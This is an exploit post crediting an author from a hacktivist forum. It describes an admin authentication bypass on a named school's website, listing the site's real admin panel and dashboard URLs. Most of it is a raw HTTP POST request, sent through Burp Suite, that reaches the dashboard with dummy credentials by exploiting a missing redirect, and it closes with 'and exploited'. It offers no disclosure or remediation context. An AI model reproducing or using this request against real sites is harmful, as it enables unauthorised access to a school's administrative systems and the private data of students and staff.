Aradhana Public School NoRedirect Admin Bypass

# Exploit Title : Aradhana Public School NoRedirect Admin Bypass 
# Exploit Date : 02.17.2023
# Exploit Author : sc0field
# Forum : HACKTIVIZM.ORG

Admin Panel -> 
http://apsrohru.com/admin/index.php

Admin Dashboard -> 
http://apsrohru.com/admin/dashboard.php

Exploit Method : 

http://apsrohru.com/admin/index.php
this page we send requests with burp suite

We are sending this request from the proxy point :

POST /admin/dashboard.php HTTP/1.1
Host: apsrohru.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://apsrohru.com
Connection: close
Referer: http://apsrohru.com/admin/index.php
Cookie: PHPSESSID=cpjpi29etdj7qaigoultdp8986
Upgrade-Insecure-Requests: 1

username=1&password=1&user-login=true

and exploited